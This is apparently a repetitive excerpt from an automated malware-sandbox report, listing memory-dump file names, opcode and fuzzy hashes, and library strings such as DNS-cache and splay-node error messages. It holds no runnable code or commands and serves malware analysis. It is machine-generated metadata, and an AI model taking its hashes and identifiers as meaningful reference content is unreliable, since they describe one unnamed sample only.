                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: *$Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-4114038171
                                                                                                                                                                                                                                                            • Opcode ID: bc08d6f722a7edfb7d28e384395073d586dbe971f728480870b66a03186a240a
                                                                                                                                                                                                                                                            • Instruction ID: 783cd3e2af1ba50c9ccb82cc658c53244b325ee65568d736a4a62320b53dc07d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc08d6f722a7edfb7d28e384395073d586dbe971f728480870b66a03186a240a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABB1F071634701DFE7289F14C885B6BB3E1BF41314F144829E99987292EBB1ECA4CF62
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Internal error clearing splay node = %d, xrefs: 00248AD1
                                                                                                                                                                                                                                                            • Hostname '%s' was found in DNS cache, xrefs: 002484B3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: Hostname '%s' was found in DNS cache$Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-2944650772
                                                                                                                                                                                                                                                            • Opcode ID: 5386cb2f971653c829a54a91679df984152f7fe083937e91a1599ba58ced1507
                                                                                                                                                                                                                                                            • Instruction ID: f3bd81585e041b69b96239923ddd4ad649df34dfae07271a5bf7bc2130a1f5e2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5386cb2f971653c829a54a91679df984152f7fe083937e91a1599ba58ced1507
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9791DB71624702DFD729DF24D881B2AB3E4BF41304F044929E9A9973A1EB71E964CF62
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: *$Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-4114038171
                                                                                                                                                                                                                                                            • Opcode ID: 1e57a8894dec3993037e4a97e156289d47aa26f9e38ce429df6d8dde750223cc
                                                                                                                                                                                                                                                            • Instruction ID: a8ee857ed6c6acd09fa96921658ac0eecd26b65b4398e9c35537c4fdcf5ed87a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e57a8894dec3993037e4a97e156289d47aa26f9e38ce429df6d8dde750223cc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F081C0716247019FE72C9E18D881B2AB3E4BB41704F044929E999873A2EB71EC64CB62
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: *$Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-4114038171
                                                                                                                                                                                                                                                            • Opcode ID: 619d782c8b0cf52ae6dd120ded2a250946e740f7a7d65102682a7a6d5007b3ac
                                                                                                                                                                                                                                                            • Instruction ID: cb3e7f71b1f4f1d9d86272377d20bf0e3a3b4cc25a99fd32dec980310634acea
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 619d782c8b0cf52ae6dd120ded2a250946e740f7a7d65102682a7a6d5007b3ac
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D81D071620701AFE7299F24CC41B6BB7E5FF44304F044928F99A87262EB72E8749B52
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: *$Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-4114038171
                                                                                                                                                                                                                                                            • Opcode ID: bbc2147548e5b5f833d96c8255807b6faab0bd5adddf07d1d101cc02e5e41b27
                                                                                                                                                                                                                                                            • Instruction ID: 271a9471e718396aacf1c235c479e8e8df3167069508aa57d41378e054008743
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbc2147548e5b5f833d96c8255807b6faab0bd5adddf07d1d101cc02e5e41b27
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A081F0716353019FE72CEF18D845B2EB3E1AF41314F144929E99987392EB71EC648B62
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: *$Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-4114038171
                                                                                                                                                                                                                                                            • Opcode ID: 9de91d870bb02e8003a531b705f9c670b5893924379bc37d30f52d6c5fbd886e
                                                                                                                                                                                                                                                            • Instruction ID: 0f3306a92ff5b789f2232cd163539f5a6a70cfbe2646e644cb423191371f727c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9de91d870bb02e8003a531b705f9c670b5893924379bc37d30f52d6c5fbd886e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3810471624301DFE729DF14C885B6A73E4BF41314F044929E9A98B3A2EB71ED64CF22
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: *$Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-4114038171
                                                                                                                                                                                                                                                            • Opcode ID: 2458674eec21df8660dfec6489cb25ff9e1e2dc17c9e14774261063fb5e46274
                                                                                                                                                                                                                                                            • Instruction ID: ef9c47d897aa7ed373c77d09886a7e0da8ce7fc0b85ab2f666b23239914d8baf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2458674eec21df8660dfec6489cb25ff9e1e2dc17c9e14774261063fb5e46274
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1071D071634301DFE72CDE24D881B2EB3E5BB41304F144829E99A87392EB71EC64DB62
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: *$Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-4114038171
                                                                                                                                                                                                                                                            • Opcode ID: 9f52274bcd94cc8abca04ead2685084073cb8e018107ad3a3cc604a2398452a8
                                                                                                                                                                                                                                                            • Instruction ID: de5449df4b68422299530ce9e33293a9c739342c3564bd6ce41c05e4f1679dcc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f52274bcd94cc8abca04ead2685084073cb8e018107ad3a3cc604a2398452a8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5381E0716347019FE72CAF14C845B2B73E1BB41314F144929E9998B3A2EB71EC64CB62
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: *$Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-4114038171
                                                                                                                                                                                                                                                            • Opcode ID: 2d9e9d6e0faa7b89b9267b0bd3fe04b2f7fee19f705cc7ccb4695363b617eda6
                                                                                                                                                                                                                                                            • Instruction ID: ddc6f3f0dbd420753d6595937a33c54d62b6b9d19a18e41551a692921cea7552
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d9e9d6e0faa7b89b9267b0bd3fe04b2f7fee19f705cc7ccb4695363b617eda6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7061C0716307019FE72CAE24D881B2FB3E5BF41314F144929E99987392EB71ED648B62
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: *$Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-4114038171
                                                                                                                                                                                                                                                            • Opcode ID: 79eda1aac2199b849e6df073adde78b69c67cffd07a07dcb334892ae1a00dcc4
                                                                                                                                                                                                                                                            • Instruction ID: b6e0c1b63ed012fe3762c261f0d753f49f84125a7df25b6608c504c16426fe4d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79eda1aac2199b849e6df073adde78b69c67cffd07a07dcb334892ae1a00dcc4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F561C1716307019FE72DAE14D885B2EB3E4BF41314F044929E999873A2EB71ED64CB62
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: isupper
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2794029478-0
                                                                                                                                                                                                                                                            • Opcode ID: 00f654fa94a8febac2b674ed53d36ff37880ed8d1256b1bc7a7e332786799c75
                                                                                                                                                                                                                                                            • Instruction ID: 763d7793e6a36ddc019a49e0acb04953186c1999a5cf5c98dd59bf0f5ddfc467
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00f654fa94a8febac2b674ed53d36ff37880ed8d1256b1bc7a7e332786799c75
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE51E7787193528BC710FF2498C856BB7E9AF96304F14892CECD657292E731ED18CB92
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Internal error clearing splay node = %d, xrefs: 00248AD1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-3978297105
                                                                                                                                                                                                                                                            • Opcode ID: 5bec284453de4cba0bcaf3f4aa7f0eade1fffe9b9adbc07581ed6559c8060393
                                                                                                                                                                                                                                                            • Instruction ID: 21c0712b8aba154c28fa15bc2209036ef295978b6e2b5c11b6075173b5afb43b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bec284453de4cba0bcaf3f4aa7f0eade1fffe9b9adbc07581ed6559c8060393
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F471BF716247019FE718DF14D881B6FB3E5BF45304F04482DE99A8B3A2EB71EC648B62
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Internal error clearing splay node = %d, xrefs: 0024645F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: Internal error clearing splay node = %d
                                                                                                                                                                                                                                                            • API String ID: 0-3978297105
                                                                                                                                                                                                                                                            • Opcode ID: c2857f69bc5f6a4a771dfe4c68ac98ecc91b777a605cdc81f4e596cde7a93659
                                                                                                                                                                                                                                                            • Instruction ID: eb11b359e8f4e413ec7432469a769d64e6b998465abf35b549562534e18f6cdb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2857f69bc5f6a4a771dfe4c68ac98ecc91b777a605cdc81f4e596cde7a93659
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 846191B0620603AFDB2CCF20D858B66F7A4FF42704F548529E81987681D7B5F878DB92
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Internal error clearing splay node = %d, xrefs: 00248AD1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
